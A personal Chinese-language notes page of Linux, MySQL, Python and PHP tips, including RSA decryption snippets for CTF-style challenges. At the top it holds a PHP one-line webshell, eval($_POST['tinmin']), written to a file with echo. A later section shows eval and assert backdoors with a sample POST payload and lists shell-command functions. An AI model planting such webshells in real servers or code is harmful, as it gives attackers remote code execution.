linux

一些转义

echo "<?php eval(\$_POST['tinmin']);?>" > tinmin.php

MYSQL5.7

创建用户

CREATE USER 'username'@'host' IDENTIFIED BY 'password';

授权

grant all privileges on mq.* to test@localhost identified by 'PASSWORD';

删除用户

DROP USER 'USER'@'host'

python php 易遗忘点

python 判断数据类型取代type

isinstance([1,2,3,4],list)
#True

python 三目运算符

a = 3 if x < 0 else 6

如果x小于零,则a=6,否则还是3
php 三目运算符

php > $x = 0;
php > $p= $x > 5 ? 5:4;
php > echo $p;
4

join 连接字符串

>>>''.join(['1','2','3'])  #列表
123
>>> ''.join(('1','2','3','4')) #元组
1234

密码学RSA python的使用

python3使用pycryptodome替代pycrypto

from Cryptodome.PublicKey import RSA
# ------读取公钥------
with open('./pub.key',"r") as f:
    key = RSA.import_key(f)
    n = key.n
    e = key.e

# ------生成私钥----------
from Cryptodome.Cipher import PKCS1_v1_5
prv = RSA.construct((N,e,int(d),p,q)) #d 一般为mpz类型,需要转换为int
rsa = PKCS1_v1_5.new(prv)
rsa.decrypt((bytes.fromhex(cipher), e)) #一般对密文进行hex解码再解密

无符号hex转ascii

from Cryptodome.Util.number import long_to_bytes
flag = int(cipher,16)
m = pow(flag,d,N)
long_to_bytes(m)    m没有0x

格式化字符串

PHP

<?php
$num = "1";
$str = "school";
echo sprintf("you are number %u in the %s",$num,$str);
?>

you are number 1 in the school

sprintf

%u 无符号十进制数
%s 字符串
%c ascii码
%% 百分号
%e 科学记数法
%f 浮点数

python

"My name is {}".format("tinmin")
"My name is {name}".format(name="tinmin")
"My name is {1}".format("tinmin","imtinmin") #My name is imtinmin

C

php 代码执行函数

eval()

<?php
    eval($_POST['tinmin']);
?>

POST:
tinmin=phpinfo();

assert()

<?php
    assert($_POST['tinmin']);
?>

assert函数执行失败,会停止执行文件后面的代码

命令执行函数

exec()

无回显,需要echo

<?php
    echo exec('ls');
?>

可以使用exec('ls',$a[]);将执行结果输出到a数组,再输出

passthru()

有命令执行结果回显

<?php
    passthru('ls');
?>

有回显,执行成功返回True,执行失败返回False

shell_exec()
相当于反撇号,无回显
例:

<?php
    echo `whoami`;
?>

system

<?php
    system('ls');
?>

在当前目录启动HTTP服务

python2

py2 -m SimpleHTTPServer 1337

python3

py3 -m http.server 1337

php5.4+

php -S localhost:7777
Categories: 手记

Leave a Reply

Your email address will not be published. Required fields are marked *